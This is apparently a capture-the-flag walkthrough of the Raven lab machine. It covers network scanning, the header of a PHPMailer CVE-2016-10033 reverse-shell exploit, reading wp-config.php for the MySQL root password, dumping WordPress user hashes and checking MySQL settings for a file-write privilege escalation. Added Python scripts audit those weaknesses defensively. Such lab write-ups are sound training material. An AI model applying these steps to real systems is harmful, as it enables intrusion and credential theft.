```
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:26:ba:69, IPv4: 192.168.3.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1     00:50:56:c0:00:08       VMware, Inc.
192.168.3.2     00:50:56:e4:e9:e5       VMware, Inc.
192.168.3.15    00:0c:29:57:62:33       VMware, Inc.
192.168.3.254   00:50:56:e0:91:13       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.967 seconds (130.15 hosts/sec). 4 responded

┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 08:28 EDT
Nmap scan report for 192.168.3.15
Host is up (0.00048s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34158/udp6  status
|   100024  1          35337/tcp   status
|   100024  1          40500/udp   status
|_  100024  1          44525/tcp6  status
35337/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:57:62:33 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.48 ms 192.168.3.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds
```
```
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.3.15/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
```
```python
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable environment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
3 - Open nc listener in one terminal: $ nc -lnvp <your ip>
4 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""

from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
```
```
www-data@Raven:/var/www/html/wordpress$ grep "password" -rn wp-config.php
grep "password" -rn wp-config.php
28:/** MySQL database password */
www-data@Raven:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to login again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '0&ItXmn^q2d[e*yB:9,L:rR<B`h+DG,zQ&SN{Or3zalh.JE+Q!Gi:L7U[(T:J5ay');
define('SECURE_AUTH_KEY',  'y@^[*q{)NKZAKK{,AA4y-Ia*swA6/O@&*r{+RS*N!p1&a$*ctt+ I/!?A/Tip(BG');
define('LOGGED_IN_KEY',    '.D4}RE4rW2C@9^Bp%#U6i)?cs7,@e]YD:R~fp#hXOk$4o/yDO8b7I&/F7SBSLPlj');
define('NONCE_KEY',        '4L{Cq,%ce2?RRT7zue#R3DezpNq4sFvcCzF@zdmgL/fKpaGX:EpJt/]xZW1_H&46');
define('AUTH_SALT',        '@@?u*YKtt:o/T&V;cbb`.GaJ0./S@dn$t2~n+lR3{PktK]2,*y/b%<BH-Bd#I}oE');
define('SECURE_AUTH_SALT', 'f0Dc#lKmEJi(:-3+x.V#]Wy@mCmp%njtmFb6`_80[8FK,ZQ=+HH/$& mn=]=/cvd');
define('LOGGED_IN_SALT',   '}STRHqy,4scy7v >-..Hc WD*h7rnYq]H`-glDfTVUaOwlh!-/?=3u;##:Rj1]7@');
define('NONCE_SALT',       'i(#~[sXA TbJJfdn&D;0bd`p$r,~.o/?%m<H+<>Vj+,nLvX!-jjjV-o6*HDh5Td{');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
```
Found the MySQL password:
R@v3nSecurity
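The dump above shows the two things a reviewer should flag in a `wp-config.php`: WordPress connects to MySQL as `root`, and the file holding that credential is readable by the web server account. The following is an added example (not part of the original walkthrough and not WordPress code): a small audit that parses the `define()` lines and reports the weak settings, including placeholder salts and a world-readable file mode. The sample configuration, the `EXAMPLE_PLACEHOLDER_PASSWORD` value and the function names are constructed for this example.

```python
import re
import stat

# Constructed sample (not the file from the walkthrough) reproducing its
# risky pattern: WordPress talks to MySQL as the root account.
SAMPLE_WP_CONFIG = r"""<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'EXAMPLE_PLACEHOLDER_PASSWORD');
define('DB_HOST', 'localhost');
define('AUTH_KEY', 'put your unique phrase here');
define('WP_DEBUG', true);
"""

# Matches define('NAME', 'string') and define('NAME', true|false); the string
# alternative tolerates backslash escapes so salts with odd characters parse.
DEFINE_RE = re.compile(
    r"define\(\s*'([A-Z_]+)'\s*,\s*(?:'((?:[^'\\]|\\.)*)'|(true|false))\s*\)"
)

# The eight secrets WordPress expects; an unset key falls back to this default text.
SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER_SECRET = "put your unique phrase here"


def parse_defines(text):
    """Return {constant: value} for every define() the regex recognises."""
    out = {}
    for m in DEFINE_RE.finditer(text):
        name, as_str, as_bool = m.groups()
        out[name] = as_str if as_str is not None else (as_bool == "true")
    return out


def audit_wp_config(text, file_mode=None):
    """Return a list of (severity, message) findings for a wp-config.php body.

    file_mode is the st_mode of the file (e.g. from os.stat), if available.
    """
    cfg = parse_defines(text)
    findings = []
    if cfg.get("DB_USER") == "root":
        findings.append(("high", "DB_USER is root: a web-tier compromise yields full "
                         "database-server control. Use a dedicated account limited to "
                         "the WordPress database."))
    if not cfg.get("DB_PASSWORD"):
        findings.append(("high", "DB_PASSWORD is empty or missing."))
    if cfg.get("WP_DEBUG") is True:
        findings.append(("medium", "WP_DEBUG is enabled: notices can leak paths and "
                         "queries to visitors."))
    for key in SALT_KEYS:
        if cfg.get(key, "") in ("", PLACEHOLDER_SECRET):
            findings.append(("medium", f"{key} is unset or still the default placeholder; "
                             "authentication cookies are derived from a known value."))
    # Any local user (not just www-data) can read a world-readable config.
    if file_mode is not None and file_mode & stat.S_IROTH:
        findings.append(("high", "wp-config.php is world-readable: any local user can read "
                         "the database credentials. Use mode 0640, owned by root and the "
                         "web server group."))
    return findings


if __name__ == "__main__":
    # Example run on the constructed sample with a 0644 file mode.
    for severity, message in audit_wp_config(SAMPLE_WP_CONFIG, file_mode=0o644):
        print(f"[{severity}] {message}")
```

To run it against a real installation, read the file and pass `os.stat(path).st_mode` as `file_mode`; the regex only covers the single-quoted `define()` form WordPress itself generates, so configurations that build values dynamically need manual review.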
Check the running processes: MySQL is running as root.
```
www-data@Raven:/var/www/html/wordpress$ ps aux | grep root|grep mysql
ps aux | grep root|grep mysql
root       544  0.0  0.3   4340  1640 ?        S    18:03   0:00 /bin/sh /usr/bin/mysqld_safe
root       913  0.0 10.4 552224 51508 ?        Sl   18:03   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
```
Check the versions of the installed packages:
```
www-data@Raven:/var/www/html/wordpress$ dpkg -l | grep mysql
dpkg -l | grep mysql
ii  libdbd-mysql-perl              4.028-2+deb8u2       amd64        Perl5 database interface to the MySQL database
ii  libmysqlclient18:amd64         5.5.60-0+deb8u1      amd64        MySQL database client library
ii  mysql-client-5.5               5.5.60-0+deb8u1      amd64        MySQL database client binaries
ii  mysql-common                   5.5.60-0+deb8u1      all          MySQL database common files, e.g. /etc/mysql/my.cnf
ii  mysql-server                   5.5.60-0+deb8u1      all          MySQL database server (metapackage depending on the latest version)
ii  mysql-server-5.5               5.5.60-0+deb8u1      amd64        MySQL database server binaries and system database setup
ii  mysql-server-core-5.5          5.5.60-0+deb8u1      amd64        MySQL database server binaries
ii  php5-mysqlnd                   5.6.36+dfsg-0+deb8u1 amd64        MySQL module for php5 (Native Driver)
ii  php5-mysqlnd-ms                1.6.0-1+b1           amd64        MySQL replication and load balancing module for PHP
```
```
www-data@Raven:/var/www/html/wordpress$ mysql -uroot -pR@v3nSecurity
mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.00 sec)

mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
```
Check whether the conditions for writing files are satisfied:
```
mysql> show global variables like 'secure%';
show global variables like 'secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
2 rows in set (0.00 sec)

mysql> show variables like '%plugin%';
show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value                  |
+---------------+------------------------+
| plugin_dir    | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)
```
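The three observations above (mysqld running as root, an empty `secure_file_priv`, and a known `plugin_dir`) are exactly the preconditions a hardening review should catch before anyone else does. This added example (not part of the original walkthrough, and not a MySQL tool) parses `ps aux` lines and the two-column table the `mysql` client prints, then reports each weak setting with its fix. The `ps` lines and variable table below are constructed samples modelled on the output shown; `audit_mysqld`, `parse_ps_line` and `parse_mysql_table` are names chosen for this example.

```python
# Constructed sample lines (not copied from a live host): the first mirrors the
# walkthrough's finding, the second is what a hardened service looks like.
PS_LINES = [
    "root       913  0.0 10.4 552224 51508 ?        Sl   18:03   0:00 "
    "/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql "
    "--plugin-dir=/usr/lib/mysql/plugin --user=root --log-error=/var/log/mysql/error.log",
    "mysql     1201  0.0  1.0  12345  6789 ?        S    18:04   0:00 "
    "/usr/sbin/mysqld --user=mysql",
]

# Constructed table in the format `SHOW GLOBAL VARIABLES` prints.
VARIABLES_OUTPUT = """\
+------------------+------------------------+
| Variable_name    | Value                  |
+------------------+------------------------+
| secure_auth      | OFF                    |
| secure_file_priv |                        |
| plugin_dir       | /usr/lib/mysql/plugin/ |
+------------------+------------------------+
"""


def parse_mysql_table(text):
    """Turn the client's two-column ASCII table into {variable: value}."""
    rows = {}
    for line in text.splitlines():
        if not line.startswith("|"):          # skip +---+ separators and noise
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 2 or cells[0] == "Variable_name":
            continue
        rows[cells[0]] = cells[1]
    return rows


def parse_ps_line(line):
    """Return (user, argv) from one `ps aux` line; COMMAND is the 11th column."""
    parts = line.split(None, 10)
    return parts[0], parts[10].split()


def audit_mysqld(ps_line, variables):
    """Return (severity, message) findings for one mysqld process + its variables."""
    user, argv = parse_ps_line(ps_line)
    findings = []
    if argv and argv[0].endswith("mysqld") and (user == "root" or "--user=root" in argv):
        findings.append(("critical", "mysqld runs as root: any SQL-level file write "
                         "(SELECT ... INTO OUTFILE, loadable plugins) happens with root "
                         "privileges. Set user=mysql under [mysqld] and drop --user=root."))
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        # In 5.5 an empty value means no restriction at all.
        findings.append(("high", "secure_file_priv is empty: file import/export is "
                         "unrestricted. Point it at a dedicated directory, or set NULL "
                         "(5.7+) to disable file operations entirely."))
    if variables.get("secure_auth", "ON") == "OFF":
        findings.append(("medium", "secure_auth is OFF: clients may authenticate with "
                         "pre-4.1 password hashes."))
    if "plugin_dir" in variables and sfp == "":
        findings.append(("high", f"plugin_dir ({variables['plugin_dir']}) plus unrestricted "
                         "file writes lets a database superuser load arbitrary shared "
                         "objects. Keep the directory root-owned and unwritable by the "
                         "mysqld user, and give application accounts neither FILE nor "
                         "write access to the mysql schema."))
    return findings


if __name__ == "__main__":
    variables = parse_mysql_table(VARIABLES_OUTPUT)
    for line in PS_LINES:
        print(parse_ps_line(line)[0], "->", audit_mysqld(line, variables) or "no findings")
```

The process check treats either a root `USER` column or an explicit `--user=root` as a hit, since `mysqld_safe` passes the configured user through on the command line; on a real host feed it `ps aux | grep mysqld` and the output of `SHOW GLOBAL VARIABLES` so the variables dictionary is complete.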
Check whether remote login is possible:
```
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
```